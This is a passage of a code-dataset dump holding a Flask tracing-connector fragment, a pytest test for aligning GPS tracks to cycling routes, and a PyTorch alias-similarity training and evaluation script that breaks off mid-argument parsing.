'_berlioz_zipkin_span')\n if zipkin_span:\n self._zipkin.serverResponse(zipkin_span, response.status_code)\n return response\n\n def _berlioz_debug(self):\n data = pprint.pformat(self._registry.extractRoot())\n html = '
<pre>' + data + '</pre>'\n        return html","repo_name":"berlioz-the/connector-python","sub_path":"berlioz/frameworks/b_flask.py","file_name":"b_flask.py","file_ext":"py","file_size_in_byte":1479,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"}
{"seq_id":"12536378381","text":"import csv\nimport pathlib\nfrom timeit import default_timer as timer\n\nimport numpy as np\nimport pytest\nfrom matplotlib import pyplot as plt\n\nfrom brevet_top_numpy_utils import FloatArray\nfrom brevet_top_strava import (\n    cut_off_prolog,\n    cut_off_epilog,\n    np_align_track_to_route,\n    clear_stops,\n)\nfrom brevet_top_strava.math import (\n    np_geo_distance_track,\n    DISTANCE_FACTOR,\n)\nfrom brevet_top_strava.simplify import down_sample_mask\n\n\n@pytest.fixture\ndef route() -> FloatArray:\n    file_path = (\n        pathlib.Path(__file__).parent.absolute()\n        / \"files\"\n        / \"track_n_route\"\n        / \"route.csv\"\n    )\n    with open(file_path, newline=\"\", encoding=\"utf-8\") as csv_file:\n        table = csv.reader(csv_file, delimiter=\",\", quotechar='\"')\n        return np.array([row for row in table], dtype=np.float64)\n\n\n@pytest.fixture\ndef track() -> FloatArray:\n    file_path = (\n        pathlib.Path(__file__).parent.absolute()\n        / \"files\"\n        / \"track_n_route\"\n        / \"track.csv\"\n    )\n    with open(file_path, newline=\"\", encoding=\"utf-8\") as csv_file:\n        table = csv.reader(csv_file, delimiter=\",\", quotechar='\"')\n        return np.array([row for row in table], dtype=np.float64)\n\n\n@pytest.fixture\ndef checkpoints() -> FloatArray:\n    return np.array(\n        [\n            (61.794567, 34.376714, 0, 0),\n            (62.4756046, 33.8108947, 0, 102000),\n            (62.4756046, 33.8108947, 0, 102000),\n            (61.8990356, 34.2402839, 0, 186000),\n            (61.8990356, 34.2402839, 0, 186000),\n            (61.8451562, 33.2059313, 0, 250000),\n            (61.8451562, 33.2059313, 0, 250000),\n            (62.0858942, 32.3777768, 0, 312000),\n            (62.0858942, 32.3777768, 0, 312000),\n            (61.6315222, 33.1801236, 0, 400000),\n            (61.6315222, 33.1801236, 0, 400000),\n            (61.6601033, 31.3930076, 0, 511000),\n            (61.6601033, 31.3930076, 0, 511000),\n            (61.9088612, 30.6221674, 0, 577000),\n            (61.9088612, 30.6221674, 0, 577000),\n            (61.700979, 30.689884, 0, 604000),\n        ],\n        dtype=np.float64,\n    )\n\n\n@pytest.fixture\ndef csv_file():\n    file_path = (\n        pathlib.Path(__file__).parent.absolute()\n        / \"files\"\n        / \"track_n_route\"\n        / \"reduced.csv\"\n    )\n    with open(file_path, \"a\", newline=\"\", encoding=\"utf-8\") as csv_file_handler:\n        yield csv.writer(\n            csv_file_handler, delimiter=\",\", quotechar='\"', quoting=csv.QUOTE_MINIMAL\n        )\n\n\ndef test_track_n_route(\n    route: FloatArray, track: FloatArray, checkpoints: FloatArray  # , csv_file\n):\n\n    assert len(route) == 92\n    assert len(track) == 13176\n    assert len(checkpoints) == 16\n    assert DISTANCE_FACTOR == 0.001\n\n    assert np.sum(route[:, 0]) == 5696.3386417\n    assert np.sum(route[:, 1]) == 3014.2516266999996\n    assert np.sum(route[:, 3]) == 28733915.214295506\n\n    assert np.sum(track[:, 0]) == 815628.6317980001\n    assert np.sum(track[:, 1]) == 432893.45070800005\n    assert np.sum(track[:, 2]) == 21463450720585.0\n    assert np.sum(track[:, 3]) == 4140305660.3\n\n    assert np.sum(checkpoints[:, 0]) == 990.5079006000001\n    assert np.sum(checkpoints[:, 1]) == 522.7269686\n    assert np.sum(checkpoints[:, 3]) == 5280000.0\n\n    start = timer()\n    down_sample = down_sample_mask(track)\n\n    draft: FloatArray = clear_stops(\n        cut_off_prolog(\n            cut_off_epilog(track[down_sample], checkpoints[-1]),\n            checkpoints[0],\n        ),\n        checkpoints,\n    )\n    end = timer()\n    print(f\"\\ncut time {end-start}\")\n\n    assert 
len(track[down_sample]) == 4443\n assert len(draft) == 4428\n\n assert np.sum(draft[:, 0]) == 274159.349531\n assert np.sum(draft[:, 1]) == 145644.086359\n assert np.sum(draft[:, 2]) == 7213116304023.0\n assert np.sum(draft[:, 3]) == 1344077537.5\n\n start = timer()\n cost, reduced = np_align_track_to_route(route, draft)\n\n cost_reviewed = np_geo_distance_track(route, reduced, factor=0)\n end = timer()\n print(f\"\\nalign time {end-start}\")\n\n assert len(reduced) == 92\n assert round(cost, 3) == -3892.192\n assert round(cost_reviewed, 2) == 3696.59\n\n assert round(np.sum(reduced[:, 0]), 3) == 5696.339\n assert round(np.sum(reduced[:, 1]), 3) == 3014.261\n assert np.sum(reduced[:, 2]) == 149866262600.0\n assert np.sum(reduced[:, 3]) == 28929489.1\n\n # for point in reduced:\n # csv_file.writerow(point.tolist())\n plt.plot(route.T[1], route.T[0], marker=\"x\")\n plt.plot(reduced.T[1], reduced.T[0], marker=\".\")\n # plt.show()\n","repo_name":"grisxa/brevet-top-functions","sub_path":"brevet_top_strava/tests/test_track_n_route.py","file_name":"test_track_n_route.py","file_ext":"py","file_size_in_byte":4555,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"40691674948","text":"import argparse\r\nimport torch\r\nimport dataset_hybrid\r\nfrom model.rnn_encoder import Hybrid_Alias_Sim\r\nfrom torch.nn import functional as F\r\nimport torch.nn as nn\r\nfrom torch.nn.utils import clip_grad_norm_\r\nfrom tqdm import tqdm\r\nimport numpy as np \r\nimport time\r\nimport random\r\nimport logging\r\nimport pickle\r\n\r\nlogger = logging.getLogger()\r\n\r\ndef load_data(filename, is_lowercase):\r\n \"\"\"\r\n Output:\r\n data: alias1(str); alias2(str), neg_alias(list[str])\r\n \"\"\"\r\n data = list()\r\n \r\n for ln in open(filename, 'r').readlines():\r\n items = ln[:-1].split('\\t') \r\n if len(items) == 5:\r\n kb_link, alias1, alias2, neg_alias, _ = items \r\n else:\r\n kb_link, alias1, alias2, neg_alias = items \r\n if len(alias1) <= 1 or len(alias2) <= 1:\r\n continue\r\n if is_lowercase:\r\n alias1 = alias1.lower()\r\n alias2 = alias2.lower()\r\n neg_alias = neg_alias.lower()\r\n neg_alias = neg_alias.split('___')\r\n #if len(neg_alias) < 5: \r\n # continue\r\n neg = neg_alias, list()\r\n data.append((alias1, alias2, neg))\r\n return data\r\n\r\n\r\n\r\ndef load_data_train(filename, is_lowercase, pre_negscore):\r\n if pre_negscore is not None:\r\n score_ln = open(pre_negscore, 'r').readlines()\r\n score_dict = dict()\r\n for ln in score_ln:\r\n alias, neg_alias, neg_score = ln[:-1].split('\\t')\r\n score_dict[alias] = {'neg':neg_alias, 'neg_score':neg_score}\r\n data = list()\r\n for ln in open(filename, 'r').readlines():\r\n items = ln[:-1].split('\\t') \r\n if len(items) == 5:\r\n kb_link, alias1, alias2, neg_alias, _ = items \r\n else:\r\n kb_link, alias1, alias2, neg_alias = items \r\n if len(alias1) <= 1 or len(alias2) <= 1:\r\n continue\r\n if is_lowercase:\r\n alias1 = alias1.lower()\r\n alias2 = alias2.lower()\r\n neg_alias = neg_alias.lower()\r\n if pre_negscore is not None:\r\n if alias1 not in score_dict:\r\n continue\r\n neg_alias = score_dict[alias1]['neg'].split('__')\r\n if len(neg_alias) < 20: \r\n continue\r\n neg_score = score_dict[alias1]['neg_score'].split('__')\r\n neg = neg_alias, neg_score\r\n data.append((alias1, alias2, neg))\r\n else:\r\n neg_alias = neg_alias.split('___')\r\n if len(neg_alias) < 20: \r\n continue\r\n neg = neg_alias, list()\r\n data.append((alias1, alias2, neg))\r\n return 
data\r\n\r\n\r\n\r\ndef load_words(exs, ngram):\r\n    words = set()\r\n    UNK = '<UNK>'\r\n    PAD = '<PAD>'\r\n    words.add(PAD)\r\n    words.add(UNK)\r\n    char2ind = {PAD: 0, UNK: 1}\r\n    ind2char = {0: PAD, 1: UNK}\r\n    for alias1, alias2, _ in exs:\r\n        for i in range(0, len(alias1)-(ngram-1), ngram):\r\n            words.add(alias1[i:i+ngram])\r\n        if ngram == 2:\r\n            if len(alias1) % 2 == 1:\r\n                words.add(alias1[len(alias1)-1])\r\n        for i in range(0, len(alias2)-(ngram-1), ngram):\r\n            words.add(alias2[i:i+ngram])\r\n        if ngram == 2:\r\n            if len(alias2) % 2 == 1:\r\n                words.add(alias2[len(alias2)-1])\r\n    words = sorted(words)\r\n    for w in words:\r\n        idx = len(char2ind)\r\n        char2ind[w] = idx\r\n        ind2char[idx] = w\r\n    return words, char2ind, ind2char\r\n\r\n\r\ndef train_vec(train_data, char2ind):\r\n    train_vec = dict()\r\n    for alias, _, neg in tqdm(train_data):\r\n        neg_alias, _ = neg\r\n        vec_alias1 = list()\r\n        x1_char_len = list()\r\n        vec_neg_alias = list()\r\n        for word in alias.split():\r\n            char_in_word = [char2ind[ch] if ch in char2ind else char2ind['<UNK>'] for ch in word]\r\n            vec_alias1.append(char_in_word)\r\n            x1_char_len.append(len(word))\r\n        \r\n        for i, nalias in enumerate(neg_alias):\r\n            if len(nalias) <= 1:\r\n                continue\r\n            vec_neg = list()\r\n            for word in nalias.split():\r\n                char_in_word = [char2ind[ch] if ch in char2ind else char2ind['<UNK>'] for ch in word]\r\n                vec_neg.append(char_in_word)\r\n            if len(vec_neg) > 0:\r\n                vec_neg_alias.append(vec_neg)\r\n        \r\n\r\n        x1 = torch.LongTensor(len(vec_neg_alias), len(vec_alias1), max(x1_char_len)).zero_()\r\n        x1_word_mask = torch.ByteTensor(len(vec_neg_alias), len(vec_alias1)).fill_(1)\r\n        x1_char_mask = torch.ByteTensor(len(vec_neg_alias), len(vec_alias1), max(x1_char_len)).fill_(1)\r\n\r\n        for i in range(len(vec_neg_alias)):\r\n            for j, word in enumerate(vec_alias1):\r\n                a1 = torch.LongTensor(word)\r\n                x1[i, j, :len(word)].copy_(a1)\r\n                x1_char_mask[i, j, :len(word)].fill_(0)\r\n            x1_word_mask[i, :len(vec_alias1)].fill_(0)\r\n\r\n        x3_word_len = list()\r\n        x3_char_len = list()\r\n        \r\n        for neg_alias in vec_neg_alias:\r\n            x3_word_len.append(len(neg_alias))\r\n            for word in neg_alias:\r\n                x3_char_len.append(len(word))\r\n        neg_v = torch.LongTensor(len(x3_word_len), max(x3_word_len), max(x3_char_len)).zero_()\r\n        neg_word_mask = torch.ByteTensor(len(x3_word_len), max(x3_word_len)).fill_(1)\r\n        neg_char_mask = torch.ByteTensor(len(x3_word_len), max(x3_word_len), max(x3_char_len)).fill_(1)\r\n        for i, neg_alias in enumerate(vec_neg_alias):\r\n            for j, word in enumerate(neg_alias):\r\n                a3 = torch.LongTensor(word)\r\n                neg_v[i, j, :len(word)].copy_(a3)\r\n                neg_char_mask[i, j, :len(word)].fill_(0)\r\n            neg_word_mask[i, :len(neg_alias)].fill_(0)\r\n        \r\n        pos = x1, x1_word_mask, x1_char_mask\r\n        neg = neg_v, neg_word_mask, neg_char_mask\r\n        train_vec[alias] = {'pos':pos, 'neg':neg}\r\n    pickle.dump(train_vec, open('train_vec.pt', 'wb'))\r\n    return train_vec\r\n\r\n\r\n\r\ndef train_score(train_vec, model, train_data):\r\n    device = torch.device(\"cuda\")\r\n    m = nn.Softmax()\r\n    new_train_data = list()\r\n    for alias, alias2, neg in tqdm(train_data):\r\n        neg_alias, _ = neg\r\n        x1, x1_word_mask, x1_char_mask = train_vec[alias]['pos']\r\n        x1 = x1.to(device)\r\n        x1_word_mask = x1_word_mask.to(device)\r\n        x1_char_mask = x1_char_mask.to(device)\r\n        neg_v, neg_word_mask, neg_char_mask = train_vec[alias]['neg']\r\n        neg_v = neg_v.to(device)\r\n        neg_word_mask = neg_word_mask.to(device)\r\n        neg_char_mask = neg_char_mask.to(device)\r\n\r\n        score = model(x1, x1_word_mask, x1_char_mask, neg_v, neg_word_mask, 
neg_char_mask)\r\n score = m(score)\r\n\r\n score = score.data.cpu().numpy().tolist()\r\n score = [str(s) for s in score]\r\n neg = neg_alias, score\r\n new_train_data.append((alias, alias2, neg))\r\n return new_train_data\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\ndef negative_sampling(args, model, pos_alias, pos_word_mask, pos_char_mask, neg_alias, neg_word_mask, neg_char_mask):\r\n pos_features = model.alias_rep(pos_alias, pos_word_mask, pos_char_mask)\r\n neg_features = model.alias_rep(neg_alias, neg_word_mask, neg_char_mask)\r\n neg_list, neg_word_len, neg_char_len = list(), list(), list()\r\n for i in range(len(pos_features)):\r\n sent1_fea = pos_features[i]\r\n sent1_fea = sent1_fea.repeat(neg_features.size(0), 1)\r\n dis = F.cosine_similarity(sent1_fea, neg_features)\r\n sorted, indices = torch.sort(dis, 0, descending=True)\r\n indices = indices.data.cpu().numpy()\r\n for j in range(args.num_neg):\r\n ind = indices[j]\r\n word_len = neg_word_mask[ind].eq(0).long().sum().item()\r\n neg_vec = neg_alias[ind]\r\n neg_words = list()\r\n neg_word_len.append(word_len)\r\n for k in range(word_len):\r\n char_len = neg_char_mask[ind][k].eq(0).long().sum().item()\r\n neg_words.append(neg_alias[ind][k][:char_len])\r\n neg_char_len.append(char_len)\r\n neg_list.append(neg_words)\r\n \r\n x3 = torch.LongTensor(len(neg_word_len), max(neg_word_len), max(neg_char_len)).zero_()\r\n x3_word_mask = torch.ByteTensor(len(neg_word_len), max(neg_word_len)).fill_(1)\r\n x3_char_mask = torch.ByteTensor(len(neg_word_len), max(neg_word_len), max(neg_char_len)).fill_(1) \r\n\r\n for i in range(len(neg_list)):\r\n vec_neg = neg_list[i]\r\n for j, word in enumerate(vec_neg):\r\n x3[i, j, :len(word)].copy_(word)\r\n x3_char_mask[i, j, :len(word)].fill_(0)\r\n x3_word_mask[i, :len(vec_neg)].fill_(0)\r\n \r\n return x3, x3_word_mask, x3_char_mask\r\n\r\n\r\n\r\n\r\n\r\ndef evaluate(args, data_loader, model, device):\r\n model.eval()\r\n ranking = 0 \r\n num_examples = 0\r\n for idx, batch in enumerate(tqdm(data_loader)):\r\n alias1 = batch[0].to(device)\r\n alias1_word_mask = batch[1].to(device)\r\n alias1_char_mask = batch[2].to(device)\r\n alias2 = batch[3].to(device)\r\n alias2_word_mask = batch[4].to(device)\r\n alias2_char_mask = batch[5].to(device)\r\n neg_alias_list = batch[6]\r\n neg_word_mask_list = batch[7]\r\n neg_char_mask_list = batch[8]\r\n\r\n\r\n pos_scores = model(alias1, alias1_word_mask, alias1_char_mask, alias2, alias2_word_mask, alias2_char_mask)\r\n pos_scores = pos_scores.data.cpu().numpy().tolist()\r\n #input()\r\n #####TODO\r\n for i in range(len(pos_scores)):\r\n \r\n neg_alias = neg_alias_list[i].to(device)\r\n neg_word_mask = neg_word_mask_list[i].to(device)\r\n neg_char_mask = neg_char_mask_list[i].to(device)\r\n\r\n pos_word_len = alias1_word_mask[i].data.cpu().eq(0).long().sum().item()\r\n pos_char_len = alias1_char_mask[i].data.cpu().eq(0).long().sum(1).numpy().tolist()\r\n\r\n pos_alias2 = alias1[i,:pos_word_len, :max(pos_char_len)].repeat(len(neg_alias), 1, 1)\r\n pos_word_mask = alias1_word_mask[i, :pos_word_len].repeat(len(neg_alias), 1)\r\n pos_char_mask = alias1_char_mask[i, :pos_word_len, :max(pos_char_len)].repeat(len(neg_alias), 1, 1)\r\n\r\n\r\n \r\n neg_scores = model(pos_alias2, pos_word_mask, pos_char_mask, neg_alias, neg_word_mask, neg_char_mask).data.cpu().numpy().tolist()\r\n pos_score = pos_scores[i]\r\n \r\n\r\n ####MRR score compute\r\n neg_scores.append(pos_score)\r\n sorted_idx = sorted(range(len(neg_scores)), key = neg_scores.__getitem__, reverse=True)\r\n ranking = ranking 
+ 1/ (sorted_idx.index(len(neg_scores) - 1) + 1)\r\n num_examples += 1\r\n \r\n ranking /= num_examples\r\n logger.info(\"MRR SCORE IS %.5f:\" % ranking)\r\n return ranking\r\n\r\n\r\ndef precision_recall(args, data_loader, model, device, ind2char):\r\n fp = open('ppl_pr_errors_1.txt', 'w')\r\n fp1 = open('ppl_pr_errors_0.txt', 'w')\r\n model.eval()\r\n ranking = 0 \r\n num_examples = 0\r\n recall_list = [0.95, 0.9, 0.85, 0.8, 0.75, 0.7, 0.65, 0.6, 0.55, 0.5, 0.45, 0.4, 0.35, 0.3, 0.25, 0.2, 0.15, 0.1, 0.05]\r\n pos_score_list = list()\r\n neg_score_list = list()\r\n\r\n for idx, batch in enumerate(tqdm(data_loader)):\r\n alias1 = batch[0].to(device)\r\n alias1_word_mask = batch[1].to(device)\r\n alias1_char_mask = batch[2].to(device)\r\n alias2 = batch[3].to(device)\r\n alias2_word_mask = batch[4].to(device)\r\n alias2_char_mask = batch[5].to(device)\r\n neg_alias_list = batch[6]\r\n neg_word_mask_list = batch[7]\r\n neg_char_mask_list = batch[8]\r\n\r\n\r\n pos_scores = model(alias1, alias1_word_mask, alias1_char_mask, alias2, alias2_word_mask, alias2_char_mask)\r\n pos_scores = pos_scores.data.cpu().numpy().tolist()\r\n\r\n for i in range(len(pos_scores)):\r\n \r\n neg_alias = neg_alias_list[i].to(device)\r\n neg_word_mask = neg_word_mask_list[i].to(device)\r\n neg_char_mask = neg_char_mask_list[i].to(device)\r\n\r\n pos_word_len = alias1_word_mask[i].data.cpu().eq(0).long().sum().item()\r\n pos_char_len = alias1_char_mask[i].data.cpu().eq(0).long().sum(1).numpy().tolist()\r\n\r\n pos_alias2 = alias1[i,:pos_word_len, :max(pos_char_len)].repeat(len(neg_alias), 1, 1)\r\n pos_word_mask = alias1_word_mask[i, :pos_word_len].repeat(len(neg_alias), 1)\r\n pos_char_mask = alias1_char_mask[i, :pos_word_len, :max(pos_char_len)].repeat(len(neg_alias), 1, 1)\r\n\r\n\r\n \r\n neg_scores = model(pos_alias2, pos_word_mask, pos_char_mask, neg_alias, neg_word_mask, neg_char_mask).data.cpu().numpy().tolist()\r\n pos_score = pos_scores[i]\r\n pos_score_list.append(pos_score)\r\n\r\n if pos_score < 0.247:\r\n ex = alias1[i].data.cpu()\r\n pos_ex = alias2[i].data.cpu()\r\n ch_list = list()\r\n\r\n for j, word in enumerate(ex):\r\n if batch[1][i, j].item() == 1:\r\n continue\r\n for k, ch in enumerate(word):\r\n if batch[2][i, j, k].item() == 1:\r\n continue\r\n else:\r\n ch = ch.item()\r\n if ch in ind2char:\r\n ch_list.append(ind2char[ch])\r\n else:\r\n ch_list.append(ind2char[1])\r\n ch_list.append(' ')\r\n \r\n\r\n fp1.write(''.join(ch_list[:-1]) + '\\t')\r\n\r\n ch_list = list()\r\n for j, word in enumerate(pos_ex):\r\n if batch[4][i, j].item() == 1:\r\n continue\r\n for k, ch in enumerate(word):\r\n if batch[5][i, j, k].item() == 1:\r\n continue\r\n else:\r\n ch = ch.item()\r\n if ch in ind2char:\r\n ch_list.append(ind2char[ch])\r\n else:\r\n ch_list.append(ind2char[1])\r\n ch_list.append(' ')\r\n fp1.write(''.join(ch_list[:-1]) + '\\t' + str(pos_score) + '\\t' + str('1') + '\\n')\r\n\r\n\r\n\r\n for m, v in enumerate(neg_scores):\r\n neg_score_list.append(v)\r\n if v > 6.582:\r\n ex = alias1[i].data.cpu()\r\n ch_list = list()\r\n\r\n for j, word in enumerate(ex):\r\n if batch[1][i, j].item() == 1:\r\n continue\r\n for k, ch in enumerate(word):\r\n if batch[2][i, j, k].item() == 1:\r\n continue\r\n else:\r\n ch = ch.item()\r\n if ch in ind2char:\r\n ch_list.append(ind2char[ch])\r\n else:\r\n ch_list.append(ind2char[1])\r\n ch_list.append(' ')\r\n \r\n fp.write(''.join(ch_list[:-1]) + '\\t')\r\n ch_list = list()\r\n \r\n neg_ex = neg_alias[m].data.cpu()\r\n for j, word in enumerate(neg_ex):\r\n if 
neg_word_mask[m, j].item() == 1:\r\n continue\r\n for k, ch in enumerate(word):\r\n if neg_char_mask[m, j, k].item() == 1:\r\n continue\r\n else:\r\n ch = ch.item()\r\n if ch in ind2char:\r\n ch_list.append(ind2char[ch])\r\n else:\r\n ch_list.append(ind2char[1])\r\n ch_list.append(' ')\r\n fp.write(''.join(ch_list[:-1]) + '\\t' + str(v) + '\\t' + str('0') + '\\n')\r\n\r\n\r\n\r\n\r\n\r\n\r\n neg_scores.append(pos_score)\r\n sorted_idx = sorted(range(len(neg_scores)), key = neg_scores.__getitem__, reverse=True)\r\n ranking = ranking + 1/ (sorted_idx.index(len(neg_scores) - 1) + 1)\r\n num_examples += 1\r\n rk = sorted_idx.index(len(neg_scores) - 1)\r\n \r\n pos_sorted_idx = sorted(range(len(pos_score_list)), key = pos_score_list.__getitem__, reverse=True)\r\n ranking = ranking /num_examples\r\n print(\"MRR SCORE IS: %.5f\" % ranking)\r\n\r\n for recall in recall_list:\r\n num_correct_labels = int(num_examples * recall)\r\n score_limit = pos_score_list[pos_sorted_idx[num_correct_labels]]\r\n\r\n ### precision\r\n lb_list = [i for i in range(len(neg_score_list)) if neg_score_list[i] >= score_limit]\r\n precision = num_correct_labels / ( len(lb_list) + num_correct_labels)\r\n print('recall is: %.2f, precision is: %.3f, score is: %.3f' %(recall, precision, score_limit))\r\n\r\n\r\n\r\n print('\\n')\r\n \r\n\r\n \r\n \r\n\r\n \r\n\r\n\r\ndef error_analysis(args, data_loader, model, device, ind2char):\r\n fp = open('people_errors.txt', 'w')\r\n model.eval()\r\n ranking = 0 \r\n num_examples = 0\r\n for idx, batch in enumerate(tqdm(data_loader)):\r\n alias1 = batch[0].to(device)\r\n alias1_word_mask = batch[1].to(device)\r\n alias1_char_mask = batch[2].to(device)\r\n alias2 = batch[3].to(device)\r\n alias2_word_mask = batch[4].to(device)\r\n alias2_char_mask = batch[5].to(device)\r\n neg_alias_list = batch[6]\r\n neg_word_mask_list = batch[7]\r\n neg_char_mask_list = batch[8]\r\n\r\n\r\n pos_scores = model(alias1, alias1_word_mask, alias1_char_mask, alias2, alias2_word_mask, alias2_char_mask)\r\n pos_scores = pos_scores.data.cpu().numpy().tolist()\r\n correct_ex = 0\r\n \r\n for i in range(len(pos_scores)):\r\n \r\n neg_alias = neg_alias_list[i].to(device)\r\n neg_word_mask = neg_word_mask_list[i].to(device)\r\n neg_char_mask = neg_char_mask_list[i].to(device)\r\n\r\n pos_word_len = alias1_word_mask[i].data.cpu().eq(0).long().sum().item()\r\n pos_char_len = alias1_char_mask[i].data.cpu().eq(0).long().sum(1).numpy().tolist()\r\n\r\n pos_alias2 = alias1[i,:pos_word_len, :max(pos_char_len)].repeat(len(neg_alias), 1, 1)\r\n pos_word_mask = alias1_word_mask[i, :pos_word_len].repeat(len(neg_alias), 1)\r\n pos_char_mask = alias1_char_mask[i, :pos_word_len, :max(pos_char_len)].repeat(len(neg_alias), 1, 1)\r\n\r\n\r\n \r\n neg_scores = model(pos_alias2, pos_word_mask, pos_char_mask, neg_alias, neg_word_mask, neg_char_mask).data.cpu().numpy().tolist()\r\n pos_score = pos_scores[i]\r\n \r\n\r\n ####MRR score compute\r\n neg_scores.append(pos_score)\r\n sorted_idx = sorted(range(len(neg_scores)), key = neg_scores.__getitem__, reverse=True)\r\n ranking = ranking + 1/ (sorted_idx.index(len(neg_scores) - 1) + 1)\r\n num_examples += 1\r\n rk = sorted_idx.index(len(neg_scores) - 1)\r\n if rk == 0 :\r\n correct_ex += 1\r\n if rk > 0:\r\n ex = alias1[i].data.cpu()\r\n pos_ex = alias2[i].data.cpu()\r\n pos_sc = pos_score\r\n\r\n #sec_rk = sorted_index[1]\r\n neg_ex = neg_alias[sorted_idx[0]].data.cpu()\r\n neg_sc = neg_scores[sorted_idx[0]]\r\n ch_list = list()\r\n\r\n for j, word in enumerate(ex):\r\n if batch[1][i, 
j].item() == 1:\r\n continue\r\n for k, ch in enumerate(word):\r\n if batch[2][i, j, k].item() == 1:\r\n continue\r\n else:\r\n ch = ch.item()\r\n if ch in ind2char:\r\n ch_list.append(ind2char[ch])\r\n else:\r\n ch_list.append(ind2char[1])\r\n ch_list.append(' ')\r\n \r\n\r\n fp.write(''.join(ch_list[:-1]) + '\\t')\r\n ch_list = list()\r\n for j, word in enumerate(pos_ex):\r\n if batch[4][i, j].item() == 1:\r\n continue\r\n for k, ch in enumerate(word):\r\n if batch[5][i, j, k].item() == 1:\r\n continue\r\n else:\r\n ch = ch.item()\r\n if ch in ind2char:\r\n ch_list.append(ind2char[ch])\r\n else:\r\n ch_list.append(ind2char[1])\r\n ch_list.append(' ')\r\n fp.write(''.join(ch_list[:-1]) + '\\t' + str(pos_sc) + '\\t')\r\n ch_list = list()\r\n for j, word in enumerate(neg_ex):\r\n if neg_word_mask[sorted_idx[0], j].item() == 1:\r\n continue\r\n for k, ch in enumerate(word):\r\n if neg_char_mask[sorted_idx[0], j, k].item() == 1:\r\n continue\r\n else:\r\n ch = ch.item()\r\n if ch in ind2char:\r\n ch_list.append(ind2char[ch])\r\n else:\r\n ch_list.append(ind2char[1])\r\n ch_list.append(' ')\r\n fp.write(''.join(ch_list[:-1]) + '\\t' + str(neg_sc) + '\\n')\r\n\r\n \r\n\r\n \r\n \r\n ranking /= num_examples\r\n correct_ex /= num_examples\r\n logger.info(\"MRR SCORE IS: %.5f\" % ranking)\r\n logger.info('p@1 is %.5f' % correct_ex)\r\n return ranking\r\n\r\n\r\n\r\n\r\n\r\ndef train(args, data_loader, val_train_loader, model, device, best_mrr):\r\n model.train()\r\n optimizer = torch.optim.Adamax(model.parameters())\r\n print_loss_total = 0 \r\n epoch_loss_total = 0\r\n start = time.time()\r\n check_point = 100\r\n\r\n for idx, batch in enumerate(tqdm(data_loader)):\r\n alias1 = batch[0].to(device)\r\n alias1_word_mask = batch[1].to(device)\r\n alias1_char_mask = batch[2].to(device)\r\n alias2 = batch[3].to(device)\r\n alias2_word_mask = batch[4].to(device)\r\n alias2_char_mask = batch[5].to(device)\r\n #neg_alias = batch[6].to(device)\r\n #neg_word_mask = batch[7].to(device)\r\n #neg_char_mask = batch[8].to(device)\r\n pos_score = model(alias1, alias1_word_mask, alias1_char_mask, alias2, alias2_word_mask, alias2_char_mask)\r\n pos_score = pos_score.sigmoid().log().sum()\r\n loss = pos_score\r\n \r\n\r\n for i in range(args.num_neg):\r\n neg_alias = batch[6][i].to(device)\r\n neg_word_mask = batch[7][i].to(device)\r\n neg_char_mask = batch[8][i].to(device)\r\n neg_score = model(alias1, alias1_word_mask, alias1_char_mask, neg_alias, neg_word_mask, neg_char_mask)\r\n neg_score = neg_score.neg().sigmoid().log().sum()\r\n loss = loss + neg_score\r\n \r\n\r\n \r\n ### negative sample selection\r\n #neg_alias, neg_word_mask, neg_char_mask = negative_sampling(args, model, alias1, alias1_word_mask, alias1_char_mask, neg_alias, neg_word_mask, neg_char_mask)\r\n \r\n #pos2_word_mask = alias1_word_mask.repeat(1,args.num_neg).view(-1, alias1_word_mask.size(1)).to(device)\r\n #pos2_char_mask = alias1_char_mask.view(-1, alias1_char_mask.size(1) * alias1_char_mask.size(2)).repeat(1,args.num_neg).view(-1, alias1_char_mask.size(1), alias1_char_mask.size(2)).to(device)\r\n #pos_alias2 = alias1.view(-1, alias1.size(1) * alias1.size(2)).repeat(1, args.num_neg).view(-1, alias1.size(1), alias1.size(2)).to(device)\r\n\r\n\r\n #neg_alias = neg_alias.to(device)\r\n #neg_word_mask = neg_word_mask.to(device)\r\n #neg_char_mask = neg_char_mask.to(device)\r\n #### tile operation\r\n\r\n #neg_score = model(pos_alias2, pos2_word_mask, pos2_char_mask, neg_alias, neg_word_mask, neg_char_mask)\r\n #neg_score = 
neg_score.neg().sigmoid().log().sum()\r\n\r\n\r\n        #neg_score = model(pos_alias2, pos2_word_mask, pos2_char_mask, neg_alias, neg_word_mask, neg_char_mask)\r\n        #neg_score = neg_score.neg().sigmoid().log().sum()\r\n\r\n\r\n\r\n        #loss = pos_score + neg_score\r\n        loss = -loss.sum() / alias1.size(0)\r\n        \r\n        optimizer.zero_grad()\r\n        loss.backward()\r\n        # clip gradients before the optimizer step so the clipped values are applied\r\n        clip_grad_norm_(model.parameters(), 5)\r\n        optimizer.step()\r\n        print_loss_total += loss.data.cpu().numpy()\r\n        epoch_loss_total += loss.data.cpu().numpy()\r\n        \r\n        if idx % check_point == 0 and idx > 0:\r\n            print_loss_total = print_loss_total\r\n            print_loss_avg = print_loss_total / check_point\r\n            \r\n            logger.info('number of steps: %d, loss: %.5f time: %.5f' % (idx, print_loss_avg, time.time()- start))\r\n            print_loss_total = 0\r\n            mrr_score = evaluate(args, val_train_loader, model, device) \r\n\r\n            if mrr_score > best_mrr:\r\n                torch.save(model, args.save_model)\r\n                best_mrr = mrr_score\r\n            model.train()\r\n            torch.cuda.empty_cache()\r\n\r\n    logger.info('epoch loss is: %.5f' % epoch_loss_total)\r\n    return best_mrr\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\ndef main():\r\n    parser = argparse.ArgumentParser(description='Alias Similarity')\r\n    parser.add_argument('--no-cuda', action='store_true', default=False)\r\n    parser.add_argument('--data-workers', type=int, default=2)\r\n    parser.add_argument('--train-file', type=str, default='../data/your_data.txt')\r\n    parser.add_argument('--dev-file', type=str, default='../data/your_data.txt')\r\n    parser.add_argument('--test-file', type=str, default='../data/your_data.txt')\r\n    parser.add_argument('--batch-size', type=int, default=32)\r\n    parser.add_argument('--num-epochs', type=int, default=3)\r\n    parser.add_argument('--input-size', type=int, default=300)\r\n    parser.add_argument('--hidden-size', type=int, default=300)\r\n    parser.add_argument('--num-layers', type=int, default=2)\r\n    parser.add_argument('--dropout', type=float, default=0.4)\r\n    parser.add_argument('--embedding-dim', type=int, default=300)\r\n    parser.add_argument('--bidirect', action='store_true', default=True)\r\n    